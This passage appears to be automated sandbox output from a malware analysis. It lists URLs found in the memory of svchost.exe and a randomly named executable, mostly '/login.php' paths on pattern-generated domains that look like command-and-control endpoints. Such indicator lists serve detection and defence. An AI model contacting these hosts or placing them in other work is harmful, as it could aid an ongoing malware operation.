Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyvin.com/
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347178577.0000000003322000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349507832.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349422845.000000000332C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347033417.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347613705.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxex.com/login.php
Source: svchost.exe, 00000002.00000003.2875776226.00000000040F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lymyxir.com/h
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337019540.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfox.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryfyr.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546183887.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552027006.0000000003323000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2621634311.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2586800323.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2605599453.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2622010653.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2616595511.000000000332F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552026882.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2617062118.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrygyn.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2751476610.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673794801.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjej.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511691560.0000000003325000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530049232.000000000332A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511442886.0000000003330000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499110020.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511703150.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2511409546.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryjir.com/login.php
Source: svchost.exe, 00000002.00000003.2289346650.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296615273.000000000337B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2289345179.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryled.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrylix.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746888339.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2829874698.000000000084D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryman.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrynad.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryson.com/login.php
Source: svchost.exe, 00000002.00000003.2344956997.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2342419975.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332264267.0000000003378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344054756.0000000003378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryvur.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418889094.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3278908147.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywoj.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyrywur.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2884058737.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxud.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2197741050.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513835440.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499628727.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.0000000009104000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2875818807.00000000091AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lysyfyj.com/login.php
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310815345.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysylej.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysylun.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388806823.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2387081098.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2604863482.0000000001098000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2572564754.0000000000FB2000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2744689381.0000000009396000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000003.2558068199.0000000008D9F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2608350004.00000000007DF000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2614917822.000000000154E000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2640207678.0000000001363000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2676238100.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2875818807.00000000091FC000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2901602167.0000000008B80000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2901602167.0000000008BD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lysynur.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667617957.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysysyx.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytoj.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysytyn.com/login.php
Source: svchost.exe, 00000002.00000003.2349886516.00000000092A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxar.com/
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346961253.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyxar.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyfux.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygon.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418118048.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3418889094.000000000335E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3278908147.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2915948048.0000000009376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2916039850.0000000009374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvygyd.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyjyr.com/login.php
Source: svchost.exe, 00000002.00000003.2375586174.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2377025491.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2378048295.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvylyx.com/login.php
